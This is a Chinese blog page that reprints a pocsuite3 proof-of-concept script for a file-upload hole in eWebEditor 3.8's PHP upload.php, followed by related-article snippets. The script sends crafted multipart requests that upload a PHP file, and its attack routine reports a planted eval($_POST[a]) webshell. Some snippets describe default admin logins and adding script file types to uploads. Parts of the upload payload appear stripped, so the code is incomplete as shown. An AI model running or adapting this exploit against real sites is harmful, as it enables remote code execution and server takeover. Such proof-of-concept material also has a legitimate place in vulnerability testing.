ewebeditor php漏洞,eWebEditor 3.8 /ewebeditor/php/upload.php 文件上传漏洞

最新推荐文章于 2023-10-18 14:57:35 发布
最新推荐文章于 2023-10-18 14:57:35 发布
阅读量253 收藏
点赞数
文章标签: ewebeditor php漏洞

"""

If you have issues about development, please read:

https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md

for more about information, plz visit http://pocsuite.org

"""

from pocsuite3.api import Output, POCBase, register_poc, requests, logger

from pocsuite3.api import get_listener_ip, get_listener_port

from pocsuite3.api import REVERSE_PAYLOAD

from pocsuite3.lib.utils import random_str

from requests.exceptions import ReadTimeout

from urllib.parse import urljoin

import re

class DemoPOC(POCBase):

vulID = '1020' # ssvid

version = '1'

author = ['chenghs@knownsec.com']

vulDate = '2011-08-01'

createDate = '2013-07-29'

updateDate = '2013-07-29'

references = ['http://sebug.net/vuldb/ssvid-20860']

name = 'eWebEditor 3.8 /ewebeditor/php/upload.php 文件上传漏洞 POC'

appPowerLink = 'http://www.ewebeditor.com/'

appName = 'eWebEditor'

appVersion = '3.8#'

vulType = 'File Upload'

desc = '''

由于style参数可控,导致可以增加PHP格式文件。

'''

samples = []

install_requires = ['']

def _verify(self):

result = {}

try:

vul_url = urljoin(self.url, 'ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en')

headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------19252181925439'}

verify_data = '''-----------------------------19252181925439

Content-Disposition: form-data; name="MAX_FILE_SIZE"

512000

-----------------------------19252181925439

Content-Disposition: form-data; name="aStyle[12]"

toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||ËÎÌå||||||0|||jpg|jpeg|||300|||FFFFFF|||1\r\n

-----------------------------19252181925439

Content-Disposition: form-data; name="uploadfile"; filename="1.php"

Content-Type: application/octet-stream

$url = $_SERVER["PHP_SELF"]; $filename = end(explode("/",$url));unlink($filename);?>

-----------------------------19252181925439--

'''

resp = requests.post(vul_url, data=verify_data, headers=headers)

res = re.findall("parent\.UploadSaved\(\'(.*?)\',\'\'\)", resp.text)

if not res:

return

verify_url = urljoin(self.url, res[0])

response = requests.get(verify_url)

if response.status_code == 200 and '300d4af0950c89b847cf6f7500e6060c' in response.text:

result['VerifyInfo'] = {}

result['VerifyInfo']['URL'] = verify_url

except Exception as e:

logger.error(str(e))

return self.parse_output(result)

def parse_output(self, result):

output = Output(self)

if result:

output.success(result)

else:

output.fail('target is not vulnerable')

return output

def _attack(self):

result = {}

try:

vul_url = urljoin(self.url, 'ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en')

headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------19252181925439'}

attack_data = '''-----------------------------19252181925439

Content-Disposition: form-data; name="MAX_FILE_SIZE"

512000

-----------------------------19252181925439

Content-Disposition: form-data; name="aStyle[12]"

toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||ËÎÌå||||||0|||jpg|jpeg|||300|||FFFFFF|||1\r\n

-----------------------------19252181925439

Content-Disposition: form-data; name="uploadfile"; filename="1.php"

Content-Type: application/octet-stream

-----------------------------19252181925439--

'''

resp = requests.post(vul_url, data=attack_data, headers=headers)

res = re.findall("parent\.UploadSaved\(\'(.*?)\',\'\'\)", resp.text)

if not res:

return

shell_url = urljoin(self.url, res[0])

response = requests.get(shell_url)

if response.status_code == 200 and '300d4af0950c89b847cf6f7500e6060c' in response.text:

result['ShellInfo'] = {}

result['ShellInfo']['URL'] = shell_url

result['ShellInfo']['Content'] = "<?php echo '300d4af0950c89b847cf6f7500e6060c'; eval($_POST[a]);?>"

except Exception as e:

logger.error(str(e))

return self.parse_output(result)

def _shell(self):

pass

register_poc(DemoPOC)

weixin_39886172
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
eWebEditor_PHP_V10.7_CHS_GBK官方原版
04-29
增加PDF文档导入转图片的功能。支持缩放比例,图片类型,文档效果的设置。 增加按Backspace键可以删除首行缩进,按Tab键可以增加首行缩进的功能。 优化使用最新Verisign双签名,支持sha256,微软签名升级而在新系统不支持sha1,解决Win10系统下控件安装会显示无效签名的问题。 修正Word导入时,如文档是加密的,可能生成图片重复的问题。 修正ActiveX与服务器端交互在特殊环境可能失败的问题。 修正选中图片,点居中,可能没有效果的问题。一键排版中,图片居中选中,有些图可能还是不会居中的问题。 修正修改行距功能在某些特别情况下可能没有效果的问题。 优化工具栏的默认配置。
其他类别eWebEditor For PHP v3.8-ewebeditorphp38.rar
04-08
功能在确认正常工作后才上传。【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来...
webeditor php高亮,PHP使用ewebeditor编辑器
weixin_39843698的博客
03-12 124
我测试版本是v3.8:(可以自己下载)文件结构:第一:把文件解压到网站根目录的一个文件夹下面(这样大家可以公用一个编辑器)第二:精简文件(可以把_开头的那个文件夹删除了,这个是例子文件夹),然后把admin文件夹下的login.ie8屏蔽了anonymous方法,所以要改成click方法。因为ewebeditor的代码是这么写的:if(element.YUSERONCLICK)eval(ele...
phpewebeditor 3.8漏洞
weixin_34384915的博客
09-22 118
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法: 1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必 须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:aler...
常见编辑器漏洞汇总【超全】(转载)
00勇士王子的博客
09-15 4827
以前挖某站发现使用了编辑器,想用通用漏洞探一探,奈何当时无从下手,这件事就放到了我的心上,就去学习了此方面的知识,了解了一些思路,把编辑器漏洞汇总到了一起,分享给想要了解这方面漏洞的小伙伴首先介绍什么是编辑器:编辑器是非常好用的网页在线编辑器,顾名思义就是让我们的用户可以在网页上进行文本的编辑,可以在网页上设置字体的样式段落行间距类似于用word编辑比较方便,并将工具生成得到的html样式插入到数据库中我们可以右键,审查元素,查看js 文件和文件内容标识。
ewebeditor 3.8php漏洞,eWebEditor v3.8 列目录漏洞【asp版本】
weixin_42651748的博客
03-19 50
SubInitParam()sType=UCase(Trim(Request.QueryString("type")))sStyleName=Trim(Request.QueryString("style"))sCusDir=Trim(Request.QueryString("cusdir"))Dimi,aStyleConfig,bValidStylebValidStyle=FalseFori=1...
PHP网页 Ewebeditor 编辑器嵌入方法
10-29
因为ewebeditor编辑器的功能强大,容易扩展等原因,一直是大家比较喜爱的编辑器,所以下面介绍下ewebeditor如何跟php结合。
[其他类别]eWebEditor For PHP v3.8_ewebeditorphp38.zip
03-18
在使用eWebEditor之前,需要将压缩包中的文件解压,并将相关文件上传至服务器的适当目录。通常包括PHP主程序文件、CSS样式表、JavaScript脚本以及语言文件。接下来,需要在PHP代码中调用编辑器,通过配置参数来设定...
[其他类别]eWebEditor For PHP v3.8_ewebeditorphp38.rar
最新发布
04-21
功能在确认正常工作后才上传。【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来...
eWebEditor php SN
07-04
eWebEditor php各版本通用,eWebEditor提示未授权时使用,里面的域名换成自己网站的域名就行了。
ewebeditor 5.5 for php 全功能版
12-30
支持IE8!全功能版!经本人亲测、修改后非常好用!
eWebEditor 3.8 for php 已经完美解决IE(7\8\9)、火狐、傲游兼容问题
04-16
eWebEditor 3.8 for php 已经完美解决IE(7\8\9)、火狐、傲游兼容问题。
eWebEditor PHP
10-10
eWebEditor PHP版,在php页面上很方便的编辑文字和上传文件
eWebEditor Version 11.1 for PHP 多语言商业版 修改弹出窗口提示
02-19
eWebEditor Version 11.1 for PHP 多语言商业版 修改弹出窗口提示
eWebEditor_php
08-22
PHP版本的eWebEditor,简杰版
eWebEditor文件上传路径的应用
編程愛好的专栏(球)
03-22 3129
eWebEditor文件上传路径的应用 1.可以eWebEditor\asp下的upload.asp中修改下参数就行了,把uploadfile/改为/uploadfiles/,表示所有图片上传到根目录下的uploadfiles文件夹中;2.Edit\db 中修改 eWebEditor_Style中,系统设定的样式中字段 S_UploadDir的值即为上传文件放置的路径。
ewebeditor编辑器漏洞
arissa666的博客
10-18 525
网页在线编辑器,权限限制不严格,弱口令,文件过滤出现问题。
【安全】eWebeditor编辑器上传webshell
qq_43017750的博客
10-17 761
一. 环境说明 服务器: IIS6.0 eWebeditor:2.8.0 客户机:windows xp 客户机浏览器: IE6.0 二. 漏洞复现 1. 默认口令登录后台 eWebeditor编辑器登录页面:admin_default.asp 默认用户:admin 默认密码:admin 2.新建样式 样式名称:test 路径模式:绝对根路径 显示路径:空 图片类型:gif|jpg|jpeg|bmp|aaspsp 3.样式工具栏 新建工具栏 按钮设置,插入或修改图片 4.预览样式上传websh
php网页编辑器,PHP网页中Ewebeditor编辑器嵌入方法
weixin_33423069的博客
03-12 188
php中我们经常会使用各种编辑器,下面我来介绍在PHP网页中Ewebeditor编辑器嵌入代码,各位同学可参考。下载“EwebeditorPHP编辑器。1在 之前加上下面一段代码:(得到 ewebeditor 中编辑的内容) 代码如下 复制代码 function checkForm(){document.form1.content .value = win...
ewebeditor漏洞
08-23
综上所述,ewebeditor存在文件上传漏洞,攻击者可以通过利用漏洞访问服务器上的文件,并进行恶意操作。建议用户及时更新并使用最新版本的编辑器,以避免潜在的安全风险。<span class="em">1</span><span class="em">...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值